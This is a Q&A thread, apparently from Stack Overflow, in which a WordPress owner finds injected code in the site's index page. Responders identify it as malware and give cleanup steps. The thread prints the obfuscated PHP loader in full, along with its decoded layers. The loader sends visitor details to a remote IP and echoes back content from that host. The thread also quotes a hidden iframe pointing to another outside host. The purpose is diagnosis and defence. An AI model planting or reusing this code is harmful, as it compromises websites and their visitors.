# Strange codes in my wordpress site and my website is running too slow

Tags: wordpress

I have a wordpress website, recently I saw too much slow loading index page. For two weeks I have been trying to find the problem but found nothing. Last day I backup all files and deleted everything from my website and when I opened my website index page in notepad++.

I saw too much strange codes and when I run my site on locally on wamp my antivirus issues too many warnings and blocks a lot of external going connections.
I saw this code on my website index page:

```
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
```

tell me why is this code in my page and how it got there, I found this on no other pages also tell me what should I do now and my eset antivirus says this when I load my page in wamp:

```
Details:

Web page:
http://91.196.216.30/bt.php?ip=127.0.0.1&host=localhost&uri=/web/wordpress/&ua=mozilla/5.0+(windows+nt+6.1)+applewebkit/535.1+(khtml,+like+gecko)+chrome/14.0.835.187+safari/535.1&ref=

Description:
Access to the web page was blocked by ESET NOD32 Antivirus.
The web page is on the list of websites with potentially dangerous content.

www.eset.com
```

Comment: The short answer is that your site was hacked. You should ask about it here: http://wordpress.stackexchange.com/

Comment: @John Why should OP ask from wordpress? Its not wordpress-only problem, if anything, it should be in http://serverfault.com

Comment: @Kalle, I was thinking because cleaning it up will be WordPress specific. Either way, it's not a programming problem.

Answer (score 0, accepted):

Its a malware. You should do the following (very fast):

- Delete all your FTP accounts, make new ones with different names and passwords
- Change all possible passwords related to your server
- Download all your server files and use some editor to search local directory for `eval(base64_decode(` and `iframe`. Remove them!
- Contact your ISP, they should run a test on your server to confirm everything is clean
- Clean your computer and setup better antivirus protection, because that's where it started
- Check "bad sites" lists for your domain and after you cleaned everything, send them request to reevaluate your domain

Lines you want to look in your case are:

```
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>
```

and

```
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI ​zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I ​pOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
```

Usually the eval part is being added after `?>` and usually in `index` files, but maybe anywhere. Its being used for pagerank scams.

If you wish to learn more about it, then check here: http://en.wikipedia.org/wiki/Iframe_virus

Answer (score 0):

The string decodes to:

```
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
```

$_X decodes to:

```
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>
```

Then $_X gets further processed by replacing all characters in `123456aouie` with the characters in `aouie123456`.

Not good.